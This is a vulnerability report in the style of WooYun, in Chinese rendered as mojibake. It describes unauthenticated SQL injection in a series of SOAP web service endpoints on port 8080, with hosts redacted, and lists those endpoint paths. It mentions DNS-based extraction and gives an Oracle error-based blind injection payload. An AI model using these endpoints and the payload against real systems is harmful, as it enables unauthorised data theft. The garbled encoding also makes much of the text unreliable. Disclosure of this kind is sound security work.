### ç®è¦æè¿°ï¼
wooyunæäºä¸ä¸ï¼æ²¡æ人æï¼æ¥ä¸åã
### 详ç»è¯´æï¼
é¦å
ï¼è¯¥æ¥å£æ¯æ éæé访é®çã
å·²https://**.**.**.**/bugs/wooyun-2010-0178322为ä¾ï¼
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl
ååå¨æ³¨å
¥
[](https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png)
[](https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png)
æ æ³æ¥éæ³¨å ¥çï¼å 为æ们填å çæ°æ®æ¯éæå¡«å çï¼ä¹æ²¡æåæ³ç²æ³¨ï¼å¯ä»¥ä½¿ç¨dnsæ¥è¯¢çæ¹å¼ã
“`
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService
“`
[](https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png)
è¿æä¸ç§æ
åµæ¯æ æ³æ¥é注å
¥ï¼ä¹ä¸è½ç²æ³¨ï¼å»¶æ¶ä¹ä¸å¯ä»¥ï¼å¯ä»¥ä½¿ç¨å¼ºå¶æ¥éç²æ³¨çåæ³ï¼
‘and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT(‘USERENV’,’DB_NAME’) from dual))=4) THEN 1 ELSE CAST(‘a’ AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)– æ¥ç解æ°æ®ã
### æ¼æ´è¯æï¼
https://**.**.**.**:9090/Read More